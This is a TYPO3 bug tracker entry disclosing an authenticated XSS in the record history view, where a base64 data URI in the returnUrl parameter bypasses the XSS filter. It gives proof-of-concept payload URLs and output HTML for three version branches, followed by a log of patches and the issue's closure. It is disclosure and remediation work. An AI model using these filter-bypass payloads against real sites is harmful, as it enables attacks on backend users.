Project

General

Profile

Actions
Copy link

Bug #68825

closed

XSS in History module (and probably more places)

Added by Helmut Hummel over 9 years ago. Updated about 6 years ago.

Status:
Closed
Priority:
Should have
Assignee:
-
Category:
-
Target version:
-
Start date:
2015-08-07
Due date:
% Done:

100%

Estimated time:
TYPO3 Version:
4.5
PHP Version:
Tags:
Complexity:
Is Regression:
No
Sprint Focus:

Description

1. DETAILS
----------
Product: Typo3 CMS
Vendor URL: typo3.org
Type: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')[CWE-79]
Date found: 30/07/2015
Date published: not yet
CVSSv3 Score: 3,5 (AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N)
CVE: Requested

2. AFFECTED VERSIONS
--------------------
Typo3 7.4.0 (latest) and below
Typo3 6.2.14 and below
Typo3 4.5.40 and below
and other older versions may be affected too.

3. VULNERABILITY DETAILS
------------------------
All current Typo3 version branches are vulnerable to an authenticated Cross-Site Scripting vulnerability while processing the "returnUrl" GET-Parameter within the "Show record history" view. While there is already a XSS filter in place, it is possible to mitigate it by using a data URI with a base64 encoded XSS payload.

The payload is slightly different through the vulnerable branches, 6.2.x and 7.4.x need a space after the "data:", while 4.5.x doesn't. In the following proof of concepts, the Javascript <script>alert('XSS')</script> is used as a base64 encoded data URI.

4.5.x Branch:
Payload:
/typo3/show_rechis.php?returnUrl=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=

Output:
<div class="typo3-fullDoc">

<div id="typo3-docheader">
<div id="typo3-docheader-row1">
<div class="buttonsleft"><div class="buttongroup"><a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=" class="typo3-goBack"><span class="t3-icon t3-icon-actions t3-icon-actions-view t3-icon-view-go-back"> </span></a></div></div>
<div class="buttonsright"></div>
</div>
<div id="typo3-docheader-row2">
<div class="docheader-row2-left"><div class="docheader-csh"><span class="t3-help-link" href="#" data-table="xMOD_csh_corebe" data-field="history_log"><abbr class="t3-help-teaser-icon"><span class="t3-icon t3-icon-actions t3-icon-actions-system t3-icon-system-help-open"> </span></abbr></span></div></div>
<div class="docheader-row2-right"></div>
</div>
</div>

6.2.x Branch:
Payload:
/typo3/show_rechis.php?returnUrl=data: text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=

Output:

<form name="settings" action="http://172.18.1.193/typo62/typo3/show_rechis.php?returnUrl=data:%20text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=&quot; method="post"><table><tr><td>Show entries:</td><td><select name="settings[maxSteps]" onChange="document.settings.submit()" style="width:100px"><option value="10"> 10</option><option value="20"> 20</option><option value="50"> 50</option><option value="100"> 100</option><option value="" selected="selected"> ALL</option><option value="marked"> marked</option></select></td></tr><tr><td>Show differences:</td><td><select name="settings[showDiff]" onChange="document.settings.submit()" style="width:100px"><option value="0"> No</option><option value="1" selected="selected"> Inline</option></select></td></tr><tr><td>Show sub elements:</td><td><select name="settings[showSubElements]" onChange="document.settings.submit()" style="width:100px"><option value="0"> No</option><option value="1" selected="selected"> Yes</option></select></td></tr><tr><td>Show inserts/deletes of records:</td><td><select name="settings[showInsertDelete]" onChange="document.settings.submit()" style="width:100px"><option value="0"> No</option><option value="1" selected="selected"> Yes</option></select></td></tr></table></form>
</div>
</div>
</div>

7.4.x Branch:
Payload:
/typo3/index.php?M=record_history&moduleToken=260ab28ad4973d29e0a77d2f799e79ca3028de28&element=tt_content%3A1&returnUrl=&returnUrl=data:%20text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=

Output:
<div class="typo3-fullDoc">
<div id="typo3-docheader">
<div class="typo3-docheader-functions">
<div class="left"><span class="t3-help-link" href="#" data-table="xMOD_csh_corebe" data-field="history_log"><abbr class="t3-help-teaser-icon"><span class="t3-icon fa t3-icon fa fa-question-circle"> </span></abbr></span></div>
<div class="right"></div>
</div>
<div class="typo3-docheader-buttons">
<div class="left"><div class="buttongroup"><a href="data: text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=" class="typo3-goBack"><span class="t3-icon fa t3-icon fa fa-angle-double-left"> </span></a></div></div>
<div class="right"></div>
</div>
</div>

Actions
Copy link
 #1

Updated by Gerrit Code Review over 9 years ago

  • Status changed from New to Under Review

Patch set 1 for branch master of project Teams/Security/TYPO3v4-Core has been pushed to the review server.
It is available at http://review.typo3.org/42544

Actions
Copy link
 #2

Updated by Gerrit Code Review over 9 years ago

Patch set 2 for branch master of project Teams/Security/TYPO3v4-Core has been pushed to the review server.
It is available at http://review.typo3.org/42544

Actions
Copy link
 #3

Updated by Gerrit Code Review over 9 years ago

Patch set 3 for branch master of project Teams/Security/TYPO3v4-Core has been pushed to the review server.
It is available at http://review.typo3.org/42544

Actions
Copy link
 #4

Updated by Gerrit Code Review about 9 years ago

Patch set 4 for branch master of project Teams/Security/TYPO3v4-Core has been pushed to the review server.
It is available at http://review.typo3.org/42544

Actions
Copy link
 #5

Updated by Gerrit Code Review about 9 years ago

Patch set 5 for branch master of project Teams/Security/TYPO3v4-Core has been pushed to the review server.
It is available at http://review.typo3.org/42544

Actions
Copy link
 #6

Updated by Gerrit Code Review about 9 years ago

Patch set 1 for branch TYPO3_6-2 of project Teams/Security/TYPO3v4-Core has been pushed to the review server.
It is available at http://review.typo3.org/43117

Actions
Copy link
 #7

Updated by Gerrit Code Review about 9 years ago

Patch set 2 for branch TYPO3_6-2 of project Teams/Security/TYPO3v4-Core has been pushed to the review server.
It is available at http://review.typo3.org/43117

Actions
Copy link
 #8

Updated by Gerrit Code Review about 9 years ago

Patch set 1 for branch TYPO3_6-2 of project Packages/TYPO3.CMS has been pushed to the review server.
It is available at http://review.typo3.org/43121

Actions
Copy link
 #9

Updated by Gerrit Code Review about 9 years ago

Patch set 1 for branch master of project Packages/TYPO3.CMS has been pushed to the review server.
It is available at http://review.typo3.org/43122

Actions
Copy link
 #10

Updated by Nicole Cordes about 9 years ago

  • Status changed from Under Review to Resolved
  • % Done changed from 0 to 100
Actions
Copy link
 #11

Updated by Helmut Hummel about 9 years ago

  • Project changed from 1716 to TYPO3 Core
  • Is Regression set to No
Actions
Copy link
 #12

Updated by Benni Mack about 6 years ago

  • Status changed from Resolved to Closed
Actions
Copy link

Also available in: Atom PDF